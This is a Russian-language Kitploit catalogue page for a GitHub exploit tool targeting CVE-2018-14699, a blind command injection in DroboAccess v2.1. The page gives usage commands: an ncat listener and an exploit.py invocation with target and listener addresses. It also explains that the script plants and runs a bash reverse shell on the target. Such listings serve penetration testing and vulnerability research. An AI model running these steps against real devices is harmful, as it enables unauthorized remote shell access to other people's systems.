Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-14699 — Неаутентифицированная слепая инъекция команд в функцию enable_user в DroboAccess v 2.1 | Kitploit
Инструменты/GitHubGitHub/revocain/cve-2018-14699
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubrevocain/cve-2018-14699

CVE-2018-14699

Неаутентифицированная слепая инъекция команд в функцию enable_user в DroboAccess v 2.1

Репозиторий
1114 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-14699

Неавторизованная инъекция команд в функции enable_user приложения DroboAccess v2.1


Использование:

  • Для использования сначала запустите прослушиватель (ncat -nvlp 1337)

  • Затем запустите эксплойт

    • пример: exploit.py -t 192.168.1.122:8080 -l 192.168.1.2 -p 1337

    '-t', '--target', help='хост для эксплуатации, напр. 192.168.1.122:8080',required=True

    '-l', '--listener-ip', help='IP прослушивателя', required=True

    '-p', '--port', help='номер порта прослушивателя', required=True

Описание:

CVE-2018-14699 — это слепая инъекция команд в DroboAccess v2.1. Проблема заключается в том, что функция enable_user принимает параметры имени пользователя как пользовательский ввод, а затем вызывает зависимость, которая выполняет shell напрямую без какой-либо санитизации. Я уточняю это, поскольку, похоже, нигде больше нет упоминаний об этой уязвимости. Итак, повторюсь: это не уязвимость в Drobo 5N2, а уязвимость в DroboAccess. Успешно протестировано на B810n.

Подробности

Скрипт попытается записать скрипт в файл с именем revshell в текущей рабочей директории. В случае успеха он затем попытается выполнить его с помощью bash в качестве исполняемого файла, установив соединение обратно с вашим прослушивателем через bash!

Ресурсы:

  • https://blog.securityevaluators.com/call-me-a-doctor-new-vulnerabilities-in-drobo5n2-4f1d885df7fc
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14699
Скачать инструмент